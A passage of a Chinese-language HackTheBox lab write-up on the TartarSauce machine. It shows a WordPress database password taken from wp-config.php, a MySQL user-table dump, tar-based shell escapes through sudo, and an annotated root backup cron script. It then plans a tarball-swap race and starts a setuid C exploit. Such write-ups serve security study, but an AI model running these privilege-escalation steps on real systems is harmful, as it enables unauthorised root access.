/post/hackbox/tartarsauce/image/image_DXfsK82zv1_hu1060bea4f2b59b03a6fec5aacfe3953a_46875_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/tartarsauce/image/image_DXfsK82zv1_hu1060bea4f2b59b03a6fec5aacfe3953a_46875_1e780824711ac417b47fc01fe45295bb.webp"
width="1183"
height="197"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>/var/www/html/webservices/wp/wp-config.php 发现mysql密码&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">w0rdpr3&lt;span class="nv">$$&lt;/span>d@t@b@&lt;span class="nv">$3&lt;/span>@cc3&lt;span class="nv">$$&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/tartarsauce/image/image_66MVDD7mXX_hu59e41a5fb225b47310584e381e35a30c_49180_1a2882e3e24746c0daf3986a12e25a9d.webp 400w,
/post/hackbox/tartarsauce/image/image_66MVDD7mXX_hu59e41a5fb225b47310584e381e35a30c_49180_21a0432105c75ae9ba34c78d78d152ff.webp 760w,
/post/hackbox/tartarsauce/image/image_66MVDD7mXX_hu59e41a5fb225b47310584e381e35a30c_49180_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/tartarsauce/image/image_66MVDD7mXX_hu59e41a5fb225b47310584e381e35a30c_49180_1a2882e3e24746c0daf3986a12e25a9d.webp"
width="687"
height="248"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>wp-config.php&lt;/p>
&lt;p>查看/etc/passwd，只有&lt;code>root&lt;/code>和&lt;code>onuma &lt;/code>有bash shell&lt;/p>
&lt;p>尝试使用mysql密码登录&lt;code>root&lt;/code>和&lt;code>onuma&lt;/code>&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">$ su root
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Password: w0rdpr3&lt;span class="nv">$$&lt;/span>d@t@b@&lt;span class="nv">$3&lt;/span>@cc3&lt;span class="nv">$$&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">su: Authentication failure
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">$ su onuma
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Password: w0rdpr3&lt;span class="nv">$$&lt;/span>d@t@b@&lt;span class="nv">$3&lt;/span>@cc3&lt;span class="nv">$$&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">su: Authentication failure
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">$
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>密码错误！&lt;/p>
&lt;p>登录mysql&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">$ mysql -uwpuser -p
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Enter password: w0rdpr3&lt;span class="nv">$$&lt;/span>d@t@b@&lt;span class="nv">$3&lt;/span>@cc3&lt;span class="nv">$$&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>找到&lt;code>wpadmin&lt;/code>密码，但是是加密的，没有破解成功&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">mysql&amp;gt; show databases&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">+--------------------+
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> Database &lt;span class="p">|&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">+--------------------+
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> information_schema &lt;span class="p">|&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> wp &lt;span class="p">|&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">+--------------------+
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="m">2&lt;/span> rows in &lt;span class="nb">set&lt;/span> &lt;span class="o">(&lt;/span>0.00 sec&lt;span class="o">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">mysql&amp;gt; use wp
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Reading table information &lt;span class="k">for&lt;/span> completion of table and column names
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">You can turn off this feature to get a quicker startup with -A
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Database changed
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">mysql&amp;gt; show tables&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">+-----------------------+
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> Tables_in_wp &lt;span class="p">|&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">+-----------------------+
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> wp_commentmeta &lt;span class="p">|&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> wp_comments &lt;span class="p">|&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> wp_gwolle_gb_entries &lt;span class="p">|&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> wp_gwolle_gb_log &lt;span class="p">|&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> wp_links &lt;span class="p">|&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> wp_options &lt;span class="p">|&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> wp_postmeta &lt;span class="p">|&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> wp_posts &lt;span class="p">|&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> wp_term_relationships &lt;span class="p">|&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> wp_term_taxonomy &lt;span class="p">|&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> wp_termmeta &lt;span class="p">|&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> wp_terms &lt;span class="p">|&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> wp_usermeta &lt;span class="p">|&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> wp_users &lt;span class="p">|&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">+-----------------------+
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="m">14&lt;/span> rows in &lt;span class="nb">set&lt;/span> &lt;span class="o">(&lt;/span>0.00 sec&lt;span class="o">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">mysql&amp;gt; &lt;span class="k">select&lt;/span> * from wp_users&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">+----+------------+------------------------------------+---------------+--------------------+----------+---------------------+---------------------+-------------+--------------+
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> ID &lt;span class="p">|&lt;/span> user_login &lt;span class="p">|&lt;/span> user_pass &lt;span class="p">|&lt;/span> user_nicename &lt;span class="p">|&lt;/span> user_email &lt;span class="p">|&lt;/span> user_url &lt;span class="p">|&lt;/span> user_registered &lt;span class="p">|&lt;/span> user_activation_key &lt;span class="p">|&lt;/span> user_status &lt;span class="p">|&lt;/span> display_name &lt;span class="p">|&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">+----+------------+------------------------------------+---------------+--------------------+----------+---------------------+---------------------+-------------+--------------+
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> &lt;span class="m">1&lt;/span> &lt;span class="p">|&lt;/span> wpadmin &lt;span class="p">|&lt;/span> &lt;span class="nv">$P$BBU0yjydBz9THONExe2kPEsvtjStGe1&lt;/span> &lt;span class="p">|&lt;/span> wpadmin &lt;span class="p">|&lt;/span> wpadmin@test.local &lt;span class="p">|&lt;/span> &lt;span class="p">|&lt;/span> 2018-02-09 20:49:26 &lt;span class="p">|&lt;/span> &lt;span class="p">|&lt;/span> &lt;span class="m">0&lt;/span> &lt;span class="p">|&lt;/span> wpadmin &lt;span class="p">|&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">+----+------------+------------------------------------+---------------+--------------------+----------+---------------------+---------------------+-------------+--------------+
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="m">1&lt;/span> row in &lt;span class="nb">set&lt;/span> &lt;span class="o">(&lt;/span>0.00 sec&lt;span class="o">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">mysql&amp;gt;
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>sudo -l&lt;/p>
&lt;p>tar命令拥有&lt;code>onuma&lt;/code>用户权限&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/tartarsauce/image/image_J8Rer9L56H_hub521d863e993b02bc8ed85057b465083_82349_fbef5d0adbed9a4b6fd260876833e03d.webp 400w,
/post/hackbox/tartarsauce/image/image_J8Rer9L56H_hub521d863e993b02bc8ed85057b465083_82349_375fa56230850d1e4fa9f5c0d9b0f1db.webp 760w,
/post/hackbox/tartarsauce/image/image_J8Rer9L56H_hub521d863e993b02bc8ed85057b465083_82349_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/tartarsauce/image/image_J8Rer9L56H_hub521d863e993b02bc8ed85057b465083_82349_fbef5d0adbed9a4b6fd260876833e03d.webp"
width="1191"
height="277"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>通过tar获得&lt;code>onuma shell&lt;/code> 有两种方法，参考&lt;/p>
&lt;p>&lt;a href="https://gtfobins.github.io/gtfobins/tar/#shell" target="_blank" rel="noopener">https://gtfobins.github.io/gtfobins/tar/#shell&lt;/a>&lt;/p>
&lt;p>方法一&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">www-data@TartarSauce:/tmp$ sudo -u onuma tar -cf /dev/null /dev/null --checkpoint&lt;span class="o">=&lt;/span>&lt;span class="m">1&lt;/span> --checkpoint-action&lt;span class="o">=&lt;/span>&lt;span class="nv">exec&lt;/span>&lt;span class="o">=&lt;/span>/bin/bash
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&amp;lt;/null /dev/null --checkpoint&lt;span class="o">=&lt;/span>&lt;span class="m">1&lt;/span> --checkpoint-action&lt;span class="o">=&lt;/span>&lt;span class="nv">exec&lt;/span>&lt;span class="o">=&lt;/span>/bin/bash
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">tar: Removing leading &lt;span class="sb">`&lt;/span>/&lt;span class="err">&amp;#39;&lt;/span> from member names
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">id
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="nv">uid&lt;/span>&lt;span class="o">=&lt;/span>1000&lt;span class="o">(&lt;/span>onuma&lt;span class="o">)&lt;/span> &lt;span class="nv">gid&lt;/span>&lt;span class="o">=&lt;/span>1000&lt;span class="o">(&lt;/span>onuma&lt;span class="o">)&lt;/span> &lt;span class="nv">groups&lt;/span>&lt;span class="o">=&lt;/span>1000&lt;span class="o">(&lt;/span>onuma&lt;span class="o">)&lt;/span>,24&lt;span class="o">(&lt;/span>cdrom&lt;span class="o">)&lt;/span>,30&lt;span class="o">(&lt;/span>dip&lt;span class="o">)&lt;/span>,46&lt;span class="o">(&lt;/span>plugdev&lt;span class="o">)&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>方法二&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">www-data@TartarSauce:/tmp$ sudo -u onuma tar xf /dev/null -I &lt;span class="s1">&amp;#39;/bin/bash -c &amp;#34;sh &amp;lt;&amp;amp;2 1&amp;gt;&amp;amp;2&amp;#34;&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&amp;lt;sudo -u onuma tar xf /dev/null -I &lt;span class="s1">&amp;#39;/bin/bash -c &amp;#34;sh &amp;lt;&amp;amp;2 1&amp;gt;&amp;amp;2&amp;#34;&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">id
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="nv">uid&lt;/span>&lt;span class="o">=&lt;/span>1000&lt;span class="o">(&lt;/span>onuma&lt;span class="o">)&lt;/span> &lt;span class="nv">gid&lt;/span>&lt;span class="o">=&lt;/span>1000&lt;span class="o">(&lt;/span>onuma&lt;span class="o">)&lt;/span> &lt;span class="nv">groups&lt;/span>&lt;span class="o">=&lt;/span>1000&lt;span class="o">(&lt;/span>onuma&lt;span class="o">)&lt;/span>,24&lt;span class="o">(&lt;/span>cdrom&lt;span class="o">)&lt;/span>,30&lt;span class="o">(&lt;/span>dip&lt;span class="o">)&lt;/span>,46&lt;span class="o">(&lt;/span>plugdev&lt;span class="o">)&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>提权到root&lt;/p>
&lt;p>使用&lt;code>pspy32&lt;/code>监听程序，发现定时任务&lt;/p>
&lt;p>&lt;code>root &lt;/code>每5分钟左右执行&lt;code>/usr/sbin/backuperer&lt;/code>&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/tartarsauce/image/image_tnIlRH7siO_hu0db51d234ba10f065492193bfe17ff2d_167854_193f7fbfae23bdc4306226a981fc89e4.webp 400w,
/post/hackbox/tartarsauce/image/image_tnIlRH7siO_hu0db51d234ba10f065492193bfe17ff2d_167854_c3461dde6a479abe457642f045b95400.webp 760w,
/post/hackbox/tartarsauce/image/image_tnIlRH7siO_hu0db51d234ba10f065492193bfe17ff2d_167854_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/tartarsauce/image/image_tnIlRH7siO_hu0db51d234ba10f065492193bfe17ff2d_167854_193f7fbfae23bdc4306226a981fc89e4.webp"
width="1294"
height="370"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>file分析&lt;code>backuperer&lt;/code>是个shell脚本&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/tartarsauce/image/image_ZlPciz4heZ_hu2873226b7dcddecc06848c6f9930ea24_62465_310bcc1a37ec200d80553ce4c9675fe7.webp 400w,
/post/hackbox/tartarsauce/image/image_ZlPciz4heZ_hu2873226b7dcddecc06848c6f9930ea24_62465_f51344a22fe143630cdc177c7cc8e4a9.webp 760w,
/post/hackbox/tartarsauce/image/image_ZlPciz4heZ_hu2873226b7dcddecc06848c6f9930ea24_62465_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/tartarsauce/image/image_ZlPciz4heZ_hu2873226b7dcddecc06848c6f9930ea24_62465_310bcc1a37ec200d80553ce4c9675fe7.webp"
width="1008"
height="181"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>/usr/sbin/backuperer&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">&lt;span class="cp">#!/bin/bash
&lt;/span>&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="cp">&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#-------------------------------------------------------------------------------------&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1"># backuperer ver 1.0.2 - by ȜӎŗgͷͼȜ&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1"># ONUMA Dev auto backup program&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1"># This tool will keep our webapp backed up incase another skiddie defaces us again.&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1"># We will be able to quickly restore from a backup in seconds ;P&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#-------------------------------------------------------------------------------------&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1"># Set Vars Here&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="nv">basedir&lt;/span>&lt;span class="o">=&lt;/span>/var/www/html
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="nv">bkpdir&lt;/span>&lt;span class="o">=&lt;/span>/var/backups
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="nv">tmpdir&lt;/span>&lt;span class="o">=&lt;/span>/var/tmp
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="nv">testmsg&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="nv">$bkpdir&lt;/span>/onuma_backup_test.txt
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="nv">errormsg&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="nv">$bkpdir&lt;/span>/onuma_backup_error.txt
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="nv">tmpfile&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="nv">$tmpdir&lt;/span>/.&lt;span class="k">$(&lt;/span>/usr/bin/head -c100 /dev/urandom &lt;span class="p">|&lt;/span>sha1sum&lt;span class="p">|&lt;/span>cut -d&lt;span class="s1">&amp;#39; &amp;#39;&lt;/span> -f1&lt;span class="k">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="nv">check&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="nv">$tmpdir&lt;/span>/check
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1"># formatting&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">printbdr&lt;span class="o">()&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="o">{&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">for&lt;/span> n in &lt;span class="k">$(&lt;/span>seq 72&lt;span class="k">)&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">do&lt;/span> /usr/bin/printf &lt;span class="s2">$&amp;#34;-&amp;#34;&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">done&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="o">}&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="nv">bdr&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="k">$(&lt;/span>printbdr&lt;span class="k">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1"># Added a test file to let us see when the last backup was run&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">/usr/bin/printf $&lt;span class="s2">&amp;#34;&lt;/span>&lt;span class="nv">$bdr&lt;/span>&lt;span class="s2">\nAuto backup backuperer backup last ran at : &lt;/span>&lt;span class="k">$(&lt;/span>/bin/date&lt;span class="k">)&lt;/span>&lt;span class="s2">\n&lt;/span>&lt;span class="nv">$bdr&lt;/span>&lt;span class="s2">\n&amp;#34;&lt;/span> &amp;gt; &lt;span class="nv">$testmsg&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1"># Cleanup from last time. 删除/var/tmp/.* 隐藏文件和删除/var/tmp/check目录&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">/bin/rm -rf &lt;span class="nv">$tmpdir&lt;/span>/.* &lt;span class="nv">$check&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1"># Backup onuma website dev files. 将/var/www/html压缩保存为一个隐藏文件到/var/tmp/&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">/usr/bin/sudo -u onuma /bin/tar -zcvf &lt;span class="nv">$tmpfile&lt;/span> &lt;span class="nv">$basedir&lt;/span> &lt;span class="p">&amp;amp;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1"># Added delay to wait for backup to complete if large files get added. 等待30秒&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">/bin/sleep &lt;span class="m">30&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1"># Test the backup integrity #比较文件差异&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">integrity_chk&lt;span class="o">()&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="o">{&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> /usr/bin/diff -r &lt;span class="nv">$basedir&lt;/span> &lt;span class="nv">$check$basedir&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="o">}&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#创建/var/tmp/check目录&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">/bin/mkdir &lt;span class="nv">$check&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#将/var/tmp/隐藏的压缩文件解压到/var/tmp/check目录&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">/bin/tar -zxvf &lt;span class="nv">$tmpfile&lt;/span> -C &lt;span class="nv">$check&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#比较解压的/var/tmp/check和当前/var/www/html的文件差异，&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#将不同的文件列表写入/var/backups/onuma_backup_test.txt，&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#如果相同，将/var/tmp/隐藏的压缩文件保存为/var/backups/onuma-www-dev.bak，并删除check目录&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="k">if&lt;/span> &lt;span class="o">[[&lt;/span> &lt;span class="k">$(&lt;/span>integrity_chk&lt;span class="k">)&lt;/span> &lt;span class="o">]]&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="k">then&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="c1"># Report errors so the dev can investigate the issue.&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> /usr/bin/printf $&lt;span class="s2">&amp;#34;&lt;/span>&lt;span class="nv">$bdr&lt;/span>&lt;span class="s2">\nIntegrity Check Error in backup last ran : &lt;/span>&lt;span class="k">$(&lt;/span>/bin/date&lt;span class="k">)&lt;/span>&lt;span class="s2">\n&lt;/span>&lt;span class="nv">$bdr&lt;/span>&lt;span class="s2">\n&lt;/span>&lt;span class="nv">$tmpfile&lt;/span>&lt;span class="s2">\n&amp;#34;&lt;/span> &amp;gt;&amp;gt; &lt;span class="nv">$errormsg&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> integrity_chk &amp;gt;&amp;gt; &lt;span class="nv">$errormsg&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nb">exit&lt;/span> &lt;span class="m">2&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="k">else&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="c1"># Clean up and save archive to the bkpdir.&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> /bin/mv &lt;span class="nv">$tmpfile&lt;/span> &lt;span class="nv">$bkpdir&lt;/span>/onuma-www-dev.bak
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> /bin/rm -rf &lt;span class="nv">$check&lt;/span> .*
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nb">exit&lt;/span> &lt;span class="m">0&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="k">fi&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>整个脚本的执行：&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">1.onuma用户将web目录压缩备份，
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">2.30秒后由root用户解压到/var/tmp/check目录，检查一下web目录有没有改动，记录一下改动的文件。没有改动就保存压缩包到备份目录
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>利用思路：&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">由于我们现在是onuma，压缩的文件是保存到/var/tmp/
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">在/usr/sbin/backuperer执行压缩文件步骤的时候，在30秒内把压缩文件替换为包含exp脚本的压缩包，30秒后root解压被替换过的压缩包，root解压出来的exp脚本权限提升为root，然后onuma执行exp脚本即可提权到root
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>编译exp.c&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#include &amp;lt;unistd.h&amp;gt;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">int main&lt;span class="o">(&lt;/span>void&lt;span class="o">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="o">{&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">setregid&lt;span class="o">(&lt;/span>0,0&lt;span class="o">)&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">setreuid&lt;span class="o">(&lt;/span>0,0&lt;span class="o">)&lt;/span>&lt;span class="p">;&lt;/span>
